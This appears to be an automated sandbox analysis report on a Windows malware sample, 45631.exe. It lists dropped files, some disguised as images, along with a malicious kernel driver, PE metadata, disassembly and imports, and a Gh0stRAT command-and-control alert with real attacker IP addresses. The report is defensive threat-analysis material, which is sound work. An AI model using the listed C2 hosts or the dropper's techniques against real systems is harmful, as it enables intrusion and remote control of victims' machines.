Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\drops[1].jpg

Download File

Process:	C:\Users\user\Documents\sgH8Ps.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	37274
Entropy (8bit):	7.991781062764932
Encrypted:	true
SSDEEP:	768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
MD5:	6D4DEB9526F3973DE0F9DCE9392F8EA7
SHA1:	520128FB9BAB7064BEA992E4427B924073E58C0E
SHA-256:	B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
SHA-512:	F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Users\user\Documents\MsMpList.dat

Download File

Process:	C:\Users\user\Desktop\45631.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	3889557
Entropy (8bit):	7.9999387512441205
Encrypted:	true
SSDEEP:	98304:9AnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:yndLOZS/DtpPJRO8OHBL4f2UQI+A
MD5:	AEB839AF0E0029F84CB23751AD327F45
SHA1:	7EB4962B96CBA033BDA36DBE86CD7D5C7CED885C
SHA-256:	E6DAD5400BB8A98A5C8A94FD24E4166B0F816E708BEB3946164C12978C75D3E3
SHA-512:	1062B53845BB815126F234A477CBD88E36AE632B6952DD9C26085749A536CEF5E1F03A195D75FB5977FF0D839E1B9404FBC46336EFD196A8862B2961CD966F0A
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Users\user\Documents\WordpadFilter.db

Download File

Process:	C:\Users\user\Desktop\45631.exe
File Type:	GIF image data, version 89a, 10 x 10
Category:	dropped
Size (bytes):	8228
Entropy (8bit):	7.978945512026199
Encrypted:	false
SSDEEP:	192:vBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:vBuNhyTlBU2dp+1XrBuCgp9vU0l
MD5:	C30B38F2D53A9A465CBE51563192E21B
SHA1:	E9ACA6E501FBB33771D55EBA405F293ECC818F8B
SHA-256:	777AF7F2F07BE3A4C7FFE030577FCB47E768403F494C7664730AD29ECDE7174C
SHA-512:	6550BDE427DADB6F870EA6ED63C69C0FFCAC856E89C3BF1B21997DA509DF9C0E4F7D512976FF2C0ED9EB56BB1BEA7AB19BFBBA1ACEFD2A0F859B15B76C8BC23D
Malicious:	false
Preview:	GIF89a.......,...........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6IX.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......\|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%...c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^\|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.\|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...\|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI

C:\Users\user\Documents\sgH8Ps.exe

Download File

Process:	C:\Users\user\Desktop\45631.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	133136
Entropy (8bit):	6.350273548571922
Encrypted:	false
SSDEEP:	3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
MD5:	D3709B25AFD8AC9B63CBD4E1E1D962B9
SHA1:	6281A108C7077B198241159C632749EEC5E0ECA8
SHA-256:	D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
SHA-512:	625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#................P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...)......................... ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\vselog.dll

Download File

Process:	C:\Users\user\Desktop\45631.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	6.002041749473993
Encrypted:	false
SSDEEP:	1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52FY:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gY
MD5:	6A14E1D973FD7054015CD2DCCD530833
SHA1:	CFD1324CB34FCEBF3075202371A20D6A98B13564
SHA-256:	60B409CDE34E6EDEEFBB75C39D0134E2DBB5FBD0A3DEED6F3AB87BBA811516B4
SHA-512:	53A80A909CCC659490D4E2A11D987D11EAEF484EE2FEDC821F52B1C3C24EC91CDBE3D128F77AF37C80FB935068199A0E006818304A5D56FDBF4E0E853D740098
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................

C:\Windows\System32\drivers\189atohci.sys

Download File

Process:	C:\Users\user\Desktop\45631.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	6.229093189812865
Encrypted:	false
SSDEEP:	384:i3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/n:iOUkgfdZ9pRyv+uPzCMHo3q4tDghd
MD5:	2FF76639B1C9C8CC77632101A97DF29E
SHA1:	ED3831D581D2C3205FDD2D6E70ADC516CB9DA6CA
SHA-256:	76741C18FB10F12EF3DCADCB9743DA1EC41E46EB64ACF80EE7CDE6C16A035B6B
SHA-512:	19F93BF5A0C7564309ACF7364D06F406A32812BDF7A52992C86DF6A213616D4FC229D67DBAAFB4AA9EFF6B1B38A1D17BFC4A0AEEA3F9C5CD4D1E034CA60CEF72
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l................................................m..........................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................

C:\xxxx.ini

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:y:y
MD5:	81051BCC2CF1BEDF378224B0A93E2877
SHA1:	BA8AB5A0280B953AA97435FF8946CBCBB2755A27
SHA-256:	7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
SHA-512:	1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
Malicious:	false
Preview:	..

\Device\Mup\localhost\pipe\atsvc

Download File

Process:	C:\Program Files (x86)\Twhtlb\Twhtlb.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	300
Entropy (8bit):	4.395543763326999
Encrypted:	false
SSDEEP:	3:ri9H5tH//lll1siQg4d1ywsiQI5kZt8jtl/zi8tkHsl/3lP92lbrisZ4mAUWKznd:ri9HHTwPYtyjtOsV39YBPZaoid0n
MD5:	17E29CB8FDBFF3C7601CA0E51859EF0B
SHA1:	3C129BC25E080BB77D827C510EEBCCABA912F542
SHA-256:	6F254D74D3DB52086FB3E5A49ADC1526BDED4AAC2F5A2AEB81D7C14B7598402E
SHA-512:	EBFF42E6C6A59461F49715BAA7FFC3515A73C64D9672416828E970D3FD1936D9B77BE2A38FB5EE28E8E680E7FB307C9C9B01286CA2E975A20C4F81F6363ED5A0
Malicious:	false
Preview:	..........<.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......,..l..@E....................NTLMSSP.............3.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ.....`13....<YbY#.K.

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	2.6383083899317192
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	45631.exe
File size:	31'614'976 bytes
MD5:	71fb431d4793bb51ce762dc5d719a730
SHA1:	39fcda8ec8c9e472e2c133cf767e1a4b5a00d01f
SHA256:	01c7b434e25b639bed532929cfeac6b4da4d7e9a07cdd0e9f3c93573191865e5
SHA512:	a280449d7d5955805ae33fb03f927501b508c4fcdfc9e9216d8d4d0c3cd1c378d142533b180f0f09c2cd1addce8b944d22e03c6b89fcdf2ca2ee1338bfa09d6f
SSDEEP:	3072:CTZr7Qctp6GVx9UpYDCu3j2I1lyXDGD04X6VitI37ot28feHxKaiI7ThJKX39/UB:Cd7Qcu69zDCA2wx7tI3428fex
TLSH:	EC67643E545E122B87F9E729D5DD1A0BF090A59B36427C0EE8D713858A1B783BDC123E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x-...~...~...~."k~...~."x~...~."{~...~...~...~...~...~."d~...~."j~...~."n~...~Rich...~........................PE..d...%5mX...

File Icon


Icon Hash:	1ed1f1f1e1e93c03

Static PE Info

General

Entrypoint:	0x1400046b0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x586D3525 [Wed Jan 4 17:47:17 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	bc775a76f703b07adc865091a82ee39c

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F30C4C2BB5Ch
dec eax
add esp, 28h
jmp 00007F30C4C260EBh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
mov dword ptr [esp+08h], ecx
dec eax
sub esp, 00000088h
dec eax
lea ecx, dword ptr [0000AABDh]
call dword ptr [0000699Fh]
dec eax
mov eax, dword ptr [0000ABA8h]
dec eax
mov dword ptr [esp+58h], eax
inc ebp
xor eax, eax
dec eax
lea edx, dword ptr [esp+60h]
dec eax
mov ecx, dword ptr [esp+58h]
call 00007F30C4C2FDD0h
dec eax
mov dword ptr [esp+50h], eax
dec eax
cmp dword ptr [esp+50h], 00000000h
je 00007F30C4C29723h
dec eax
mov dword ptr [esp+38h], 00000000h
dec eax
lea eax, dword ptr [esp+48h]
dec eax
mov dword ptr [esp+30h], eax
dec eax
lea eax, dword ptr [esp+40h]
dec eax
mov dword ptr [esp+28h], eax
dec eax
lea eax, dword ptr [0000AA68h]
dec eax
mov dword ptr [esp+20h], eax
dec esp
mov ecx, dword ptr [esp+50h]
dec esp
mov eax, dword ptr [esp+58h]
dec eax
mov edx, dword ptr [esp+60h]
xor ecx, ecx
call 00007F30C4C2FD7Eh
jmp 00007F30C4C29704h
dec eax
mov eax, dword ptr [esp+00000088h]
dec eax
mov dword ptr [0000AB34h], eax
dec eax
lea eax, dword ptr [esp+00000088h]
dec eax
add eax, 08h
dec eax
mov dword ptr [0000AAC1h], eax

Rich Headers

Programming Language:

[ASM] VS2005 build 50727
[C++] VS2005 build 50727
[ C ] VS2005 build 50727
[IMP] VS2008 SP1 build 30729
[RES] VS2005 build 50727
[LNK] VS2005 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xce48	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1e000	0xcd0c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x1d000	0x75c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb290	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb000	0x238	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9e5e	0xa000	d9633e0e6bbdc62fabd022d8ee71c353	False	0.4929443359375	data	5.82270589751864	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xb000	0x25d0	0x2600	2c131bac2dafc709cf96cd53b4e3007f	False	0.4009046052631579	data	5.38726836540401	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xe000	0xe240	0xc800	badac5ea6a137a49d77b6ff1d824af6f	False	0.855234375	data	7.591063161216864	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x1d000	0x75c	0x800	a45f6f9c628e055fcff9592e603bf201	False	0.4697265625	data	4.196043641178827	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x1e000	0xcd0c	0xce00	2974a26962f85b85a530007f73a836d0	False	0.5054801274271845	data	5.467811993857623	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1e490	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 0	German	Germany	0.39146341463414636
RT_ICON	0x1eaf8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	German	Germany	0.4771505376344086
RT_ICON	0x1ede0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	German	Germany	0.5405405405405406
RT_ICON	0x1ef08	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	German	Germany	0.4522921108742004
RT_ICON	0x1fdb0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	German	Germany	0.463898916967509
RT_ICON	0x20658	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	German	Germany	0.45809248554913296
RT_ICON	0x20bc0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	German	Germany	0.5409751037344398
RT_ICON	0x23168	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	German	Germany	0.6393058161350844
RT_ICON	0x24210	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	German	Germany	0.5638297872340425
RT_ICON	0x24678	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 0	German	Germany	0.37621951219512195
RT_ICON	0x24ce0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	German	Germany	0.47580645161290325
RT_ICON	0x24fc8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	German	Germany	0.4831081081081081
RT_ICON	0x250f0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	German	Germany	0.5093283582089553
RT_ICON	0x25f98	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	German	Germany	0.572202166064982
RT_ICON	0x26840	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	German	Germany	0.47471098265895956
RT_ICON	0x26da8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	German	Germany	0.508609958506224
RT_ICON	0x29350	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	German	Germany	0.6285178236397748
RT_ICON	0x2a3f8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	German	Germany	0.500886524822695
RT_GROUP_ICON	0x2a860	0x84	data	German	Germany	0.6363636363636364
RT_GROUP_ICON	0x2a8e4	0x84	data	German	Germany	0.6363636363636364
RT_VERSION	0x2a968	0x34c	data	German	Germany	0.471563981042654
RT_MANIFEST	0x2acb4	0x56	ASCII text, with CRLF line terminators	English	United States	1.0232558139534884

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegSetValueExW, RegCloseKey, RegOpenKeyExW
SHELL32.dll	ShellExecuteW
KERNEL32.dll	HeapFree, GetVersionExA, HeapAlloc, GetProcessHeap, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, GetProcAddress, GetModuleHandleA, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, RtlUnwindEx, GetModuleFileNameW, FreeEnvironmentStringsA, MultiByteToWideChar, GetEnvironmentStrings, FreeEnvironmentStringsW, GetLastError, GetEnvironmentStringsW, GetCommandLineA, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, FlsGetValue, FlsSetValue, TlsFree, FlsFree, SetLastError, GetCurrentThreadId, FlsAlloc, HeapSetInformation, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LeaveCriticalSection, EnterCriticalSection, LoadLibraryA, InitializeCriticalSection, Sleep, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, WideCharToMultiByte, HeapReAlloc, GetStringTypeA, GetStringTypeW, LCMapStringA, VirtualAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
German	Germany
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-02T12:15:54.006747+0100	2852901	ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin	1	192.168.2.6	49999	8.217.152.240	8917	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 12:14:03.421509027 CET	49946	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:03.421540022 CET	443	49946	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:03.421631098 CET	49946	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:03.429975033 CET	49946	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:03.429990053 CET	443	49946	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:04.663213968 CET	443	49946	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:04.663348913 CET	49946	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:04.663861990 CET	443	49946	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:04.665617943 CET	49946	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:04.714322090 CET	49946	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:04.714329004 CET	443	49946	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:04.715065956 CET	443	49946	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:04.715154886 CET	49946	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:04.716686010 CET	49946	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:04.763320923 CET	443	49946	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:05.025835991 CET	443	49946	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:05.025913954 CET	443	49946	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:05.025966883 CET	49946	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:05.025993109 CET	49946	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:05.033668041 CET	49946	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:05.033689022 CET	443	49946	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:05.158961058 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:05.159006119 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:05.159082890 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:05.159277916 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:05.159290075 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:06.447851896 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:06.448035955 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:06.448539972 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:06.448544979 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:06.448966980 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:06.448971033 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:06.781879902 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:06.781900883 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:06.781935930 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:06.781951904 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:06.781964064 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:06.781996965 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:06.782470942 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:06.782510042 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:06.782527924 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:06.782532930 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:06.782578945 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:06.782578945 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.014260054 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.014386892 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.014420033 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.014465094 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.015080929 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.015134096 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.015180111 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.015225887 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.016001940 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.016052961 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.016369104 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.016422987 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.017241955 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.017297983 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.258410931 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.258476019 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.258655071 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.258704901 CET	49957	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:07.258929014 CET	443	49957	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:07.258979082 CET	49957	443	192.168.2.6	39.103.20.59
